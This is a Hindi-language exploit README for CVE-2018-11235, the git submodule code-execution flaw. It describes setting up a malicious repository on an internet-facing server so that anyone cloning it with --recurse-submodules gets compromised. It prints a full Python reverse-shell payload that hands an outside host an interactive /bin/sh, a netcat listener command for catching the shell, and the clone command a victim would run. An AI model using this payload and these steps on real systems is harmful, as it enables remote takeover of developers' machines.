
CVE-2018-11235 का शोषण करता है
शोषण शीर्षक: Clone and Pwn
दिनांक: 4 जून, 2018
शोषण लेखक: Alejandro Caceres
विक्रेता होमपेज: https://git-scm.com/
सॉफ्टवेयर लिंक: https://git-scm.com/downloads
संस्करण: git क्लाइंट संस्करणों पर मनमाना कोड निष्पादित किया जाता है Git 2.13.7 से पहले, 2.14.x 2.14.4 से पहले, 2.15.x 2.15.2 से पहले, 2.16.x 2.16.4 से पहले, और 2.17.x 2.17.1 से पहले
परीक्षण किया गया: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235
CVE-2018-11235, जिसे यहाँ clone and pwn कहा गया है, एक दुर्भावनापूर्ण git रेपो बनाता है जो git में एक बग का शोषण करता है। जब --recurse-submodules फ्लैग का उपयोग करके रेपो क्लोन किया जाता है, तो git क्लाइंट संस्करणों पर मनमाना कोड निष्पादित किया जाता है: Git 2.13.7 से पहले, 2.14.x 2.14.4 से पहले, 2.15.x 2.15.2 से पहले, 2.16.x 2.16.4 से पहले, और 2.17.x 2.17.1 से पहले।
इस मॉड्यूल का उपयोग करने के लिए इसे सीधे इंटरनेट एक्सेस वाले सर्वर पर रखें (जैसे AWS, Digital Ocean) और evil.sh खोलें। यह कुछ इस तरह दिखेगा:
#!/usr/bin/python
EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080
#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
अपने रिवर्स शेल को प्राप्त करने के लिए EXTERN_IP और EXTERN_PORT को IP (बाहरी) और पोर्ट पर सेट करें। रिवर्स शेल को कुछ इस तरह प्राप्त किया जा सकता है:
nc -l <EXTERN_IP> EXTERN_PORT जैसे nc -l 193.23.23.32 8080
या Metasploit के सामान्य शेल मॉड्यूल के साथ। एक बार जब उपयोगकर्ता कमांड git clone --recurse-submodules git://<your ip>/repo dest_dir चलाता है, तो आपको एक रिवर्स शेल प्राप्त होगा।
यदि आपको कई बार चलाने में (या एक असफल प्रयास के बाद) समस्या हो रही है, तो निम्नलिखित की जाँच करें:
ps aux | grep git के साथ प्रक्रियाओं की जाँच करें ताकि सुनिश्चित हो सके कि आप पहले से gitdaemon नहीं चला रहे हैं। किसी भी gitdaemon प्रक्रिया को समाप्त करें।कोड @peff के git patch से लिया गया है (t/t7415-submodule-names.sh टेस्ट फाइल देखें)।
इस प्रकार, यह रिपॉजिटरी GNU जनरल पब्लिक लाइसेंस संस्करण 2 के तहत प्रकाशित की गई है।
पुराने git संस्करणों के लिए अतिरिक्त सुधार @atorralba की सौजन्य से (इस पोस्ट में विवरण)।
यह स्क्रिप्ट https://github.com/Rogdham/CVE-2018-11235 से अनुकूलित की गई है, ढेर सारा प्यार और श्रेय
=======
CVE-2018-11235 का शोषण करता है
द्वारा @_hyp3ri0n और @mehaase